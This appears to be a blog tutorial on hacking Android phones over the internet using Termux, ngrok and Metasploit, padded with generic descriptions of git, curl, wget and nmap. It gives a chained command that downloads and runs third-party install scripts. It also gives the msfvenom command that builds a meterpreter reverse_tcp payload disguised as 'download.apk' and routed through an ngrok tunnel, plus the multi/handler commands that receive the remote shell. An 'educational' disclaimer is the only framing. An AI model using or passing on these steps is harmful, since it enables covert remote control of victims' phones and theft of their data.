CAUTION :
This is an informative article for anyone who wants to learn more about how hackers hack android devices using Termux in the WAN network. Only use this for educational purposes neither try to violate any legal terms & conditions nor we are responsible for any data loss or misuse.
INTRODUCTION
Termux is a free and open-source app that can be used in order to hack or pentest a device. It provides a Linux environment.
Termux installs on Android devices and can be downloaded from the Google Play store for free. It has a user-friendly interface, making it easy to use for beginners and professionals alike. Termux is not limited to hacking purposes – it can also be used as an SSH client, etc., making it the perfect tool for almost any scenario.
Hacking is the process of breaking into a computer system to get access to data. It can also be used to change or delete data, or just gain control of the system.
The most popular hacking tool is Metasploit. It offers to exploit modules for vulnerabilities in various systems and relies on automated exploitation and payload delivery. It is used to find out the flaws in the system, perform penetration testing, exploit networks, and collect data. It is widely used because it leverages automation to provide fast results with minimal human input.
PART 1 :
Create an account on Ngrok :
ngrok is a secure and portable service that tunnels TCP ports into the local machine.
It is a network interface that can be used to create an HTTP endpoint for any other internet connection. For example, it can be used to tunnel the local host of the development machine to the public internet so that it can be accessed by others.
One of the biggest difficulties with remote development is sharing your environment with others. All of the major cloud providers offer SSH access to their environments, but this often creates more problems than it solves. You may need to share your SSH credentials, which means you are sharing your password with the world. Alternatively, you may be able to create a public git repository where people can clone your environment. However, if these are not feasible options for you then ngrok is an excellent alternative – it makes it easy for developers to share their development environments online!
ngrok is a tool that creates a secure tunnel from inside of the local machine all the way out to the internet. This means that anyone who has access to this URL will be able to view all of your app’s traffic through this tunnel!
To download ngrok click the below download button:
Unzip the downloaded file & you can now use the ngrok services.
Metasploit Installation :
pkg install git curl wget nmap -y && wget https://github.com/Hax4us/TermuxBlack/raw/master/install.sh && chmod +x install.sh && ./install.sh -i && pkg install ruby2 && wget https://raw.githubusercontent.com/Hax4us/Metasploit_termux/master/metasploit.sh && chmod +x metasploit.sh && ./metasploit.sh
Lets talk about the packages which we were downloaded from the above command :
About GIT :
Git is a free and open source distributed version control system that was designed by Linus Torvalds.
Git package is a command line tool that can be used to install and manage git packages on the computer. It also has the ability to maintain repositories, branches, and tags. It can also be used to create commits and patches, some of which may not have been pushed upstream yet.
About CURL :
The name curl stands for Client URL. curl is a command line tool for transferring data from or to a server. It supports various types of protocols and can be used in many different ways.
The curl package provides a cross-platform program for transferring data using one of the supported protocols. This package is compatible with most Unix systems, Windows, MacOS X and even iOS and Android, so it can be installed on virtually any system that you have access to.
About WGET :
The wget package is a unix utility for downloading files from the internet. It is available in most operating systems and can be used in scripting and batch files.
The primary features of the wget package are:
– it is a command-line tool that can be used with scripting and batch files
– it downloads only the files that match the URL
– it supports HTTP, FTP, and HTTPS protocols
– it has an option to resume broken downloads
About NMAP :
The goal of the nmap package is to provide a suite of networking utilities for scanning large networks or portions of networks. Nmap offers a number of features that make it extremely useful, such as host discovery, port scanning, service and operating system detection, version detection, and scriptable output.
Nmap is a well-known network security scanner that has been used by many organizations and individuals for network exploration and security audits.
PART 2 :
Generate an android payload using msfvenom :
bash msfvenom -p android/meterpreter/reverse_tcp lhost=ngork_ip lport=ngrok_port -o download.apk
Exploiting the payload :
bash msfconsole
use multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
exploit
Conclusion :
Hacking is a process that most people believe they can do without any previous knowledge or experience, but this is a wrong notion. It is a misconception that hacking only takes skill and knowledge, it also requires patience and effort.
We really hope that you’ve found this text interesting and taken something useful away from it. Consider sharing with your colleagues and peers if you wish to see more articles like this on the web 🙂